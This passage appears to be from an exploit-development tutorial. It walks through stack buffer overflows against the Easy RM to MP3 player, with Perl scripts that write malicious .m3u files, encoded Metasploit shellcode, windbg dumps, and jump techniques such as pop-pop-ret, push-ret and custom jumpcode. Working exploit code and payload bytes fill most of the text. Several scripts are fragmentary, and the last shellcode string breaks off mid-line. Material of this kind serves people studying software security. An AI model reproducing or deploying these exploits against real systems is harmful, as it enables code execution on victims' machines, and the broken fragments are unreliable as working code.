"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" .
"\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" .
"\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" .
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" .
"\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" .
"\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" .
"\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" .
"\x31\x42\x4c\x42\x43\x45\x50\x41\x41";
open($FILE,">$file");
close($FILE);
pwned !
pop ret
As explained above, in the Easy RM to MP3 example, we have been able to tweak our buffer so
ESP pointed directly at our shellcode. What if there is not a single register that points to the
shellcode ?
Well, in this case, an address pointing to the shellcode may be on the stack. If you dump esp,
look at the first addresses. If one of these addresses points to your shellcode (or a buffer you
control), then you can find a pop ret or pop pop ret (nothing to do with SEH based exploits
here) to take addresses off the stack (skipping them) and then jump to the address that should
bring you to the shellcode.
The pop ret technique obviously is only usable when ESP+offset already contains an address
which points to the shellcode… So dump esp, see if one of the first addresses points to the
shellcode, and put a reference to pop ret (or pop pop ret or pop pop pop ret) into EIP. This will
take some addresses from the stack (one address for each pop) and will then put the next
address into EIP. If that one points to the shellcode, then you win.
There is a second use for pop ret : what if you control EIP, no register points to the shellcode,
but your shellcode can be found at ESP+8 ? In that case, you can put a pop pop ret into EIP,
which will jump to ESP+8. If you put a pointer to jmp esp at that location, then it will jump to
the shellcode that sits right after the jmp esp pointer.
Let’s build a test case. We know that we need 26094 bytes before overwriting EIP, and that we
need 4 more bytes before we are at the stack address where ESP points at (in my case, this is
0x000ff730).
We will simulate that at ESP+8, we have an address that points to the shellcode. (in fact, we’ll
just put the shellcode behind it – again, this is just a test case).
26094 A’s, 4 XXXX’s (to end up where ESP points at), then a break, 7 NOP’s, a break, and more
NOP’s. Let’s pretend the shellcode begins at the second break. The goal is to make a jump
over the first break, right to the second break (which is at ESP+8 bytes = 0x000ff738).
my $file= "test1.m3u";
open($FILE,">$file");
close($FILE);
The application crashed because of the buffer overflow. We’ve overwritten EIP with “BBBB”. ESP
points at 000ff730 (which starts with the first break), then 7 NOP’s, and then we see the
second break, which really is the beginning of our shellcode (and sits at address 0x000ff738).
+0x42424231:
42424242 ?? ???
0:000> d esp
0:000> d 000ff738
The goal is to get the value of ESP+8 into EIP (and to craft this value so it jumps to the
shellcode). We’ll use the pop ret technique + address of jmp esp to accomplish this.
One POP instruction will take 4 bytes off the top of the stack. So the stack pointer would then
point at 000ff734. Running another pop instruction would take 4 more bytes off the top of the
stack. ESP would then point to 000ff738. When a “ret” instruction is performed, the value
at the current address of ESP is put in EIP. So if the value at 000ff738 contains the address of a
jmp esp instruction, then that is what would be executed next. The buffer after 000ff738 must
then contain our shellcode.
We need to find the pop,pop,ret instruction sequence somewhere, and overwrite EIP with the
address of the first part of the instruction sequence, and we must set ESP+8 to the address of
jmp esp, followed by the shellcode itself.
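The pointer arithmetic above can be checked with a toy model of the stack. This is a sketch for illustration only: the `Cpu` class is hypothetical, the addresses are the ones from this walkthrough, and the stack is modelled as a dictionary from address to 32-bit value.

```python
class Cpu:
    """Just enough state to trace pop / pop / ret."""

    def __init__(self, esp, stack):
        self.esp = esp
        self.eip = None
        self.regs = {}
        self.stack = dict(stack)  # address -> 32-bit value

    def pop(self, reg):
        # Load the value at ESP into the register, then move ESP up 4 bytes.
        self.regs[reg] = self.stack[self.esp]
        self.esp += 4

    def ret(self):
        # Load the value at ESP into EIP, then move ESP up 4 bytes.
        self.eip = self.stack[self.esp]
        self.esp += 4


stack = {
    0x000FF730: 0x90909090,  # skipped by the first pop
    0x000FF734: 0x90909090,  # skipped by the second pop
    0x000FF738: 0x01CCF23A,  # address of jmp esp, consumed by ret
}
cpu = Cpu(esp=0x000FF730, stack=stack)
cpu.pop("eax")
cpu.pop("ebp")
cpu.ret()
# cpu.eip is now 0x01ccf23a and cpu.esp is 0x000ff73c
```

After the ret, ESP points just past the jmp esp pointer, which is why the shellcode has to be placed right behind it.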
First of all, we need to know the opcode for pop pop ret. We’ll use the assemble functionality
in windbg to get the opcodes :
0:000> a
pop eax
pop ebp
7c901210 ret
ret
7c901211
0:000> u 7c90120e
ntdll!DbgBreakPoint:
7c901210 c3 ret
7c901213 c3 ret
7c90121a cc int 3
Of course, you can pop to other registers as well. These are some other available pop opcodes:
pop eax 58
pop ebx 5b
pop ecx 59
pop edx 5a
pop esi 5e
pop ebp 5d
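With these opcodes, looking for a pop pop ret sequence comes down to scanning bytes. The sketch below shows the idea on an in-memory byte string; it only knows the pop opcodes listed above plus c3 for ret, and the function name, sample bytes, and base address are made up for the example.

```python
# pop opcodes from the table above, plus the ret opcode.
POP_OPCODES = {0x58: "eax", 0x5B: "ebx", 0x59: "ecx",
               0x5A: "edx", 0x5E: "esi", 0x5D: "ebp"}
RET = 0xC3


def find_pop_pop_ret(blob, base=0):
    """Return (address, first_reg, second_reg) for every pop/pop/ret found."""
    hits = []
    for i in range(len(blob) - 2):
        first, second, third = blob[i], blob[i + 1], blob[i + 2]
        if first in POP_OPCODES and second in POP_OPCODES and third == RET:
            hits.append((base + i, POP_OPCODES[first], POP_OPCODES[second]))
    return hits


# Hypothetical bytes standing in for part of a loaded module.
sample = bytes.fromhex("90585dc3905b5ec3cc")
hits = find_pop_pop_ret(sample, base=0x1000)
# hits == [(0x1001, "eax", "ebp"), (0x1005, "ebx", "esi")]
```

Which registers get popped does not matter for this technique, as long as the exploit does not depend on the values they held before.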
Now we need to find this sequence in one of the available dll’s. In part 1 of the tutorial we
have spoken about application dll’s versus OS dll’s. It is generally recommended to use
application dll’s because that increases the chances of building a reliable exploit across
windows platforms/versions… But you still need to make sure the dll’s use the same base
addresses every time. Sometimes the dll’s get rebased, and in that scenario it could be better
to use one of the OS dll’s (user32.dll or kernel32.dll for example).
Open Easy RM to MP3 (don’t open a file or anything) and then attach windbg to the running
process.
Windbg will show the loaded modules, both OS modules and application modules. (Look at the
top of the windbg output, and find the lines that start with ModLoad).
You can show the image base of a dll by running dumpbin.exe (from Visual Studio) with
parameter /headers against the dll. This will allow you to define the lower and upper address
for searches.
You should try to avoid using addresses that contain null bytes (because it would make the
exploit harder… not impossible, just harder.)
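A quick way to screen candidate addresses is to pack them the way they will appear in the buffer (little-endian) and look for unwanted bytes. A minimal sketch; the helper names are illustrative, and only the null byte is treated as bad by default:

```python
import struct


def pack_address(addr):
    """Little-endian 4-byte form of a 32-bit address, as written to the buffer."""
    return struct.pack("<I", addr)


def bad_bytes_in(addr, bad=b"\x00"):
    """Return the bytes of the packed address that appear in `bad`."""
    return [b for b in pack_address(addr) if b in bad]
```

For the addresses seen in these notes, 0x01ccf23a packs without a null byte, while a stack address such as 0x000ff730 packs with one, which is one reason the exploit returns to an address inside a module rather than directly to the stack.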
Ok, we can jump to ESP+8 now. In that location we need to put the address of jmp esp,
because, as explained before, the ret instruction will take the address from that location and
put it in EIP. At that point, ESP will point to our shellcode, which is located right
after the jmp esp address… so what we really want at that point is a jmp esp.
From part 1 of the tutorial, we have learned that 0x01ccf23a refers to jmp esp.
Ok, let’s go back to our perl script and replace the “BBBB” (used to overwrite EIP with) with
one of the 3 pop,pop,ret addresses, followed by 8 bytes (NOP) (to simulate that the shellcode
is 8 bytes off from the top of the stack), then the jmp esp address, and then the shellcode.
[AAAAAAAAAAA...AA][0x01ab6a10][NOPNOPNOPNOPNOPNOPNOPNOP][0x01ccf23a][Shellcode]
                  (=POPPOPRET)
2 : POP POP RET is executed. EIP gets overwritten with 0x01ccf23a (because that is the address
that was found at ESP+0x8). ESP now points to shellcode.
3 : Since EIP is overwritten with address to jmp esp, the second jump is executed and the
shellcode is launched.
                        --------------------------------------- (1)
                        |                                     |
                        |                                     V
[AAAAAAAAAAA...AA][0x01ab6a10][NOPNOPNOPNOPNOPNOPNOPNOP][0x01ccf23a][Shellcode]
                  (=POPPOPRET)                                |          ^
                                                              |   (2)    |
                                                              |----------|
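The same layout can be written down as a byte string, which makes the offsets easy to verify. This is a sketch in Python rather than the Perl used in these notes; it uses the numbers quoted in the text (26094 bytes of junk, 4 filler bytes between the EIP overwrite and ESP, the example pop pop ret and jmp esp addresses) and a breakpoint plus NOPs as a stand-in payload. The names are illustrative.

```python
import struct

OFFSET_TO_EIP = 26094      # bytes before the EIP overwrite (from the text)
POP_POP_RET = 0x01AB6A10   # example pop pop ret address from the diagram
JMP_ESP = 0x01CCF23A       # jmp esp address from part 1


def build_buffer(payload):
    """Assemble junk + EIP + filler + 8 skipped bytes + jmp esp + payload."""
    junk = b"A" * OFFSET_TO_EIP
    eip = struct.pack("<I", POP_POP_RET)   # little-endian, as on x86
    pre_esp = b"X" * 4                     # ESP points right after these
    skipped = b"\x90" * 8                  # consumed by the two pops
    jmp_esp = struct.pack("<I", JMP_ESP)   # picked up by the ret at ESP+8
    return junk + eip + pre_esp + skipped + jmp_esp + payload


# Stand-in payload: a breakpoint followed by NOPs, not real shellcode.
test_payload = b"\xcc" + b"\x90" * 16
buf = build_buffer(test_payload)
```

The jmp esp pointer ends up at offset 26094 + 4 + 4 + 8 = 26110 in the buffer, and the payload starts immediately after it.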
We’ll simulate this with a break and some NOP’s as shellcode, so we can see if our jumps work
fine.
my $file= "test1.m3u";
$shellcode = $shellcode . $jmpesp; #address to return via pop pop ret ( = jmp esp)
open($FILE,">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
(d08.384): Break instruction exception - code 80000003 (!!! second chance !!!)
+0xff72b:
000ff73c cc int 3
0:000> d esp
Cool, that worked. Now let’s replace the NOPs after jmp esp (ESP+8) with real shellcode (some
NOPs to be sure + shellcode, encoded with alpha_upper, that executes calc):
my $file= "test1.m3u";
$shellcode = $shellcode . $jmpesp; #address to return via pop pop ret ( = jmp esp)
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" .
"\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" .
"\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" .
"\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" .
"\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" .
"\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" .
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" .
"\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" .
"\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" .
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" .
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" .
"\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" .
"\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" .
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" .
"\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" .
"\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" .
"\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" .
"\x31\x42\x4c\x42\x43\x45\x50\x41\x41";
open($FILE,">$file");
close($FILE);
pwned !
push return
push ret is somewhat similar to call [reg]. If one of the registers is directly pointing at your
shellcode, and if for some reason you cannot use a jmp [reg] to jump to the shellcode, then
you could
• push the address held in that register onto the stack. It will sit on top of the stack.
• ret (which will take that address back from the stack and jump to it)
In order to make this work, you need to overwrite EIP with the address of a push [reg] + ret
sequence in one of the dll’s.
Suppose the shellcode is located directly at ESP. You need to find the opcode for ‘push
esp’ and the opcode for ‘ret’ first
0:000> a
000ff7ae push esp
push esp
000ff7af ret
ret
0:000> u 000ff7ae
+0xff79d:
000ff7ae 54 push esp
000ff7af c3 ret
=> opcodes are 0x54 (push esp) and 0xc3 (ret)
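Once the opcode sequence is known, the search for a usable address can be sketched in a few lines of Python. This is only an illustration: the module bytes and the base address below are made up, and in practice a debugger or search tool does this work against the DLLs that are really loaded.

```python
def find_sequence(image, base, needle):
    """Return every address inside a module image where `needle` occurs."""
    hits = []
    pos = image.find(needle)
    while pos != -1:
        hits.append(base + pos)
        pos = image.find(needle, pos + 1)
    return hits


def is_null_free(address):
    """True if none of the 4 little-endian bytes of the address is 0x00."""
    return b"\x00" not in address.to_bytes(4, "little")


# Hypothetical module contents and base address, for illustration only.
fake_image = b"\x90\x90\x54\xc3\x90\x54\xc3"
fake_base = 0x01AB10FE

PUSH_ESP_RET = b"\x54\xc3"  # push esp ; ret
all_hits = find_sequence(fake_image, fake_base, PUSH_ESP_RET)
candidates = [addr for addr in all_hits if is_null_free(addr)]
```

The first hit lands on an address with a null byte in it and is filtered out, which is the same check you would apply by hand before picking an address for EIP.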
my $file= "test1.m3u";
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" .
"\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" .
"\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" .
"\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" .
"\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" .
"\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" .
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" .
"\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" .
"\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" .
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" .
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" .
"\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" .
"\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" .
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" .
"\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" .
"\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" .
"\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" .
"\x31\x42\x4c\x42\x43\x45\x50\x41\x41";
open($FILE,">$file");
print $FILE $junk.$eip.$prependesp.$shellcode;
close($FILE);
pwned again !
jmp [reg]+[offset]
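Another technique to overcome the problem that the shellcode begins at an offset from a
register (ESP in our example) is to find a jmp [reg + offset] instruction (and to overwrite
EIP with the address of that instruction). Let’s assume that we need to jump 8
bytes again (see previous exercise). Using the jmp reg+offset technique, we would simply jump
over the 8 bytes at the beginning of ESP and land directly at our shellcode. Keep in mind that
the bracketed form is an indirect jump: it transfers control to the address stored at ESP+8, so
that dword has to hold a pointer to the shellcode.
We need to do 3 things : find the opcode for jmp [esp+8], find an address that holds this
instruction, and craft the exploit so that it overwrites EIP with this address.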
0:014> a
7c90120e jmp [esp + 8]
jmp [esp + 8]
7c901212
0:014> u 7c90120e
ntdll!DbgBreakPoint:
7c90120e ff642408 jmp dword ptr [esp+8]
=> opcode is ff642408
Now you can search for a DLL that contains this opcode, and use its address to overwrite EIP.
In our example, I could not find this exact opcode anywhere. Of course, you are not
limited to looking for jmp [esp+8]. You could also look for offsets bigger than 8, because you
control everything beyond ESP+8: you could easily put some additional NOPs at the beginning of the
shellcode and make the jump land in the NOPs.
(By the way: the opcode for ret is c3. But I’m sure you’ve already figured that out for yourself.)
Blind return
• When the ret is executed, the last added 4 bytes (topmost value) are popped from the
stack and put in EIP
• you cannot point EIP at a register directly, because you cannot use jmp or call
instructions (this means that you need to hardcode the memory address of the start
of the shellcode), but
• you can control the data at ESP (at least the first 4 bytes)
In order to set this up, you need to have the memory address of the shellcode (= the address
of ESP). As usual, try to avoid that this address starts with / contains null bytes, or you will not
be able to load your shellcode behind EIP. If your shellcode can be put at a location, and this
location address does not contain a null byte, then this would be another working technique.
Set the first 4 bytes of the shellcode (first 4 bytes of ESP) to the address where the shellcode
begins, and overwrite EIP with the address of the ‘ret’ instruction. From the tests we have
done in the first part of this tutorial, we remember that ESP seems to start at 0x000ff730. Of
course this address could change on different systems, but if you have no other way than
hardcoding addresses, then this is the only thing you can do.
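A quick way to see why a hardcoded stack address is awkward is to pack it the way it would sit in the buffer. The sketch below uses only the two addresses mentioned in these notes; the helper names are made up for illustration.

```python
import struct


def packed_address(address):
    """Pack a 32-bit address in little-endian order, as it is stored in memory."""
    return struct.pack("<I", address)


def truncation_point(payload):
    """Index of the first null byte (string terminator), or None if there is none."""
    index = payload.find(b"\x00")
    return None if index == -1 else index


stack_address = packed_address(0x000FF730)  # ESP value seen in the earlier tests
dll_address = packed_address(0x01CCF23A)    # jmp esp address used elsewhere in these notes
```

Because of the little-endian byte order, the null byte of 0x000ff730 ends up as the last of the 4 bytes. The address itself is still written, but anything placed after it is cut off by the string terminator.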
This address contains a null byte, so when building the payload, we create a buffer that looks
like this :
The problem with this example is that the address used to overwrite EIP contains a null byte
(= string terminator), so the shellcode is not put in ESP. This is a problem, but it may not be a
showstopper. Sometimes you can find your buffer (look at the first 26094 A’s, not at the ones
that are pushed after overwriting EIP, because those are unusable because of the null byte)
at other locations/registers, such as eax, ebx, ecx, etc. In that case, you could try to put the
address held in that register in the first 4 bytes of the shellcode (at the beginning of ESP, so directly
after overwriting EIP), and still overwrite EIP with the address of a ‘ret’ instruction.
This is a technique that has a lot of requirements and drawbacks, but it only requires a “ret”
instruction. Anyway, it didn’t really work for Easy RM to MP3.
Dealing with small buffers : jumping anywhere with custom jumpcode
We have talked about various ways to make EIP jump to our shellcode. In all scenarios, we
have had the luxury of being able to put this shellcode in one piece in the buffer. But what if we
see that we don’t have enough space to host the entire shellcode ?
In our exercise, we have been using 26094 bytes before overwriting EIP, and we have noticed
that ESP points to 26094+4 bytes, and that we have plenty of space from that point forward.
But what if we only had 50 bytes (ESP -> ESP+50 bytes) ? What if our tests showed that
everything written after those 50 bytes was not usable ? 50 bytes for hosting
shellcode is not a lot, so we need to find a way around that. Perhaps we can use the 26094
bytes that were used to trigger the actual overflow.
First, we need to find these 26094 bytes somewhere in memory. If we cannot find them
anywhere, it’s going to be difficult to reference them. In fact, if we can find these bytes and
find out that we have another register pointing (or almost pointing) at these bytes, it may even
be quite easy to put our shellcode in there.
If you run some basic tests against Easy RM to MP3, you will notice that parts of the 26094
bytes are also visible in the ESP dump :
my $file= "test1.m3u";
my $junk = "A" x 26094; #bytes needed to reach the saved EIP
my $eip = "BBBB";
my $preshellcode = "X" x 54; #let's pretend this is the only space we have available
my $nop = "\x90" x 230; #added some nops to visually separate our 54 X's from other data
open($FILE,">$file");
print $FILE $junk.$eip.$preshellcode.$nop;
close($FILE);
+0x42424231:
42424242 ?? ???
0:000> d esp
0:000> d
0:000> d
We can see our 50 X’s at ESP. Let’s pretend this is the only space available for shellcode (we
think). However, when we look further down the stack, we find A’s again, starting from
address 000ff849 (=ESP+281).
When we look at other registers, there’s no trace of X’s or A’s. (You can just dump the
registers, or search memory for a run of A’s.)
So this is it. We can jump to ESP to execute some code, but we only have 50 bytes to spend on
shellcode. We also see other parts of our buffer further down in the stack dump. In fact, when
we continue to dump the contents of ESP, we have a huge buffer filled with A’s.
Luckily there is a way to host the shellcode in the A’s and use the X’s to jump to the A’s. In
order to make this happen, we need a couple of things
• The position inside the buffer of 26094 A’s that shows up in the ESP dump at 000ff849.
(Where do the A’s shown in the ESP dump really start ? If we want to put our shellcode
inside the A’s, we need to know exactly where it needs to be put.)
• “Jumpcode” : code that will make the jump from the X’s to the A’s. This code cannot
be larger than 50 bytes (because that’s all we have available directly at ESP)
We can find the exact position by using guesswork, by using custom patterns, or by using one
of Metasploit’s patterns.
We’ll use one of Metasploit’s patterns, and we’ll start with a small one (if we are looking at the
start of the A’s, we won’t have to work with a large pattern :-) )
Generate a pattern of, let’s say, 1000 characters, and replace the first 1000 characters in the
Perl script with the pattern (and then add 25101 A’s)
my $file= "test1.m3u";
my $pattern = "Aa0Aa1Aa2Aa3Aa4Aa....g8Bg9Bh0Bh1Bh2B";
my $junk = "A" x 25101; #A's that follow the 1000 character pattern
my $eip = "BBBB";
my $preshellcode = "X" x 54; #let's pretend this is the only space we have available at ESP
my $nop = "\x90" x 230; #added some nops to visually separate our 54 X's from other data in the ESP dump
open($FILE,">$file");
print $FILE $pattern.$junk.$eip.$preshellcode.$nop;
close($FILE);
+0x42424231:
42424242 ?? ???
0:000> d esp
0:000> d
0:000> d
What we see at 000ff849 is definitely part of the pattern. The first 4 characters are 5Ai6.
Using Metasploit’s pattern_offset utility, we see that these 4 characters are at offset 257. So
instead of putting 26094 A’s in the file, we’ll put 257 A’s, then our shellcode, and fill up the rest
of the 26094 characters with A’s again. Or even better, we’ll start with only 250 A’s, then 50
NOPs, then our shellcode, and then fill up the rest with A’s. That way, we don’t have to be
very specific when jumping. If we can land in the NOPs before the shellcode, it will work just
fine.
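The offset lookup can be reproduced without the Metasploit tools. The sketch below is a stand-in written for these notes, not the actual pattern_create / pattern_offset code: it rebuilds the same style of cyclic pattern (uppercase letter, lowercase letter, digit) and searches it for the 4 characters seen in the dump.

```python
import string


def pattern_create(length):
    """Build a cyclic pattern (Aa0Aa1Aa2...) that is `length` characters long."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
                chunks.append(upper + lower + digit)
    return "".join(chunks)[:length]


def pattern_offset(needle, length=1000):
    """Return the index of the first occurrence of `needle`, or -1 if it is absent."""
    return pattern_create(length).find(needle)


offset = pattern_offset("5Ai6")
```

With a 1000 character pattern this gives offset 257 for 5Ai6, which matches the value used above.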
Let’s see what the script and stack look like when we set this up :
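my $file= "test1.m3u";
my $buffersize = 26094;
my $junk = "A" x 250; #A's in front of the nops
my $nop = "\x90" x 50; #nops in front of the shellcode
my $shellcode = "\xcc"; #breakpoint as placeholder shellcode
my $restofbuffer = "A" x ($buffersize-(length($junk)+length($nop)+length($shellcode)));
my $eip = "BBBB";
my $preshellcode = "X" x 54; #let's pretend this is the only space we have available
my $nop2 = "\x90" x 230; #added some nops to visually separate our 54 X's from other data
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
open($FILE,">$file");
print $FILE $buffer.$eip.$preshellcode.$nop2;
close($FILE);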
When the application dies, we can see our 50 NOPs starting at 000ff842, followed by the
shellcode (0xcc at 000ff874), and then again followed by the A’s. Ok, that looks fine.
+0x42424231:
42424242 ?? ???
0:000> d esp
0:000> d
0:000> d
The second thing we need to do is build our jumpcode that needs to be placed at ESP. The goal
of the jumpcode is to jump to ESP+281
Writing jump code is as easy as writing down the required statements in assembly and then
translating them to opcode (making sure that we don’t have any null bytes or other restricted
characters at the same time) :-)
Jumping to ESP+281 would require : add 281 to the ESP register, and then perform jmp esp.
281 = 119h. Don’t try to add everything in one shot, or you may end up with an opcode that
contains null bytes: 119h does not fit in a signed byte, so it would be encoded as the 32-bit
immediate 19 01 00 00.
Since we have some flexibility (due to the NOP’s before our shellcode), we don’t have to be
very precise either. As long as we add 281 (or more), it will work. We have 50 bytes for our
jumpcode, but that should not be a problem.
Let’s add 0x5e (94) to esp, 3 times. Then do the jump to esp. The assembly commands are :
• add esp,0x5e
• add esp,0x5e
• add esp,0x5e
• jmp esp
0:014> a
add esp,0x5e
add esp,0x5e
add esp,0x5e
jmp esp
7c90121c
0:014> u 7c901211
ntdll!DbgBreakPoint+0x3:
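The byte encoding of this jumpcode can be checked with a short Python sketch. It assumes the standard x86 encodings 83 C4 ib (add esp, imm8), 81 C4 id (add esp, imm32) and FF E4 (jmp esp); the function names are made up for illustration.

```python
import struct

ADD_ESP_IMM8 = b"\x83\xc4"   # add esp, imm8 (the byte is sign-extended)
ADD_ESP_IMM32 = b"\x81\xc4"  # add esp, imm32
JMP_ESP = b"\xff\xe4"        # jmp esp


def build_jumpcode(distance, step=0x5E):
    """Repeat 'add esp, step' until at least `distance` is covered, then jmp esp."""
    if not 0 < step <= 0x7F:
        raise ValueError("step must fit in a positive signed byte")
    count = -(-distance // step)  # ceiling division
    return (ADD_ESP_IMM8 + bytes([step])) * count + JMP_ESP


def add_esp_imm32(value):
    """Encode the one-shot 'add esp, value' form, for comparison."""
    return ADD_ESP_IMM32 + struct.pack("<I", value)


jumpcode = build_jumpcode(281)
one_shot = add_esp_imm32(0x119)
```

The three-step version is 11 bytes long, which agrees with the assembler session above (7c901211 to 7c90121c), and it is free of null bytes. The one-shot version carries two of them.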
my $file= "test1.m3u";
my $buffersize = 26094;
my $eip = "BBBB";
my $preshellcode = "X" x 4;
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
open($FILE,">$file");
close($FILE);
The jumpcode is perfectly placed at ESP. When the jumpcode runs, ESP will point into
the NOPs (between 000ff842 and 000ff873). Shellcode starts at 000ff874.
+0x42424231:
42424242 ?? ???
0:000> d esp
0:000> d
0:000> d
The last thing we need to do is overwrite EIP with a “jmp esp”. From part 1 of the tutorial, we
know that this can be achieved via address 0x01ccf23a
• EIP will be overwritten with 0x01ccf23a (points into a DLL, runs “JMP ESP”)
• The data after overwriting EIP will be overwritten with jumpcode that adds 282 to ESP
and then jumps to that address.
• After the payload is sent, EIP will jump to ESP. This will trigger the jumpcode, which jumps
to ESP+282: NOP sled first, and then the shellcode gets executed.
my $file= "test1.m3u";
my $buffersize = 26094;
my $preshellcode = "X" x 4;
my $buffer = $junk.$nop.$shellcode.$restofbuffer;
open($FILE,">$file");
The generated m3u file will bring us right at our shellcode (which is a break). (EIP = 0x000ff874
= begin of shellcode )
(d5c.c64): Break instruction exception - code 80000003 (!!! second chance !!!)
+0xff863:
000ff874 cc int 3
0:000> d esp
Replace the break with some real shellcode (and replace the A’s with NOPs)… (shellcode :
excluded characters 0x00, 0xff, 0xac, 0xca)
When you replace the A’s with NOPs, you’ll have more space to jump into, so we can live with
jumpcode that only jumps 188 positions further (2 times 5e)
my $file= "test1.m3u";
my $buffersize = 26094;
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
my $shellcode = "\x89\xe2\xd9\xeb\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d" .
"\x38\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55\x47" .
"\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x43\x31\x4a\x4f\x4c" .
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x45\x51\x4a" .
"\x4b\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x45\x51\x4a\x4e\x46" .
"\x51\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x45" .
"\x57\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c" .
"\x34\x47\x4b\x50\x54\x51\x34\x45\x54\x44\x35\x4d\x35\x4c" .
"\x4b\x51\x4f\x51\x34\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44" .
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" .
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4b\x39\x51\x4c\x46" .
"\x44\x45\x54\x48\x43\x51\x4f\x46\x51\x4c\x36\x43\x50\x50" .
"\x56\x43\x54\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44" .
"\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x44" .
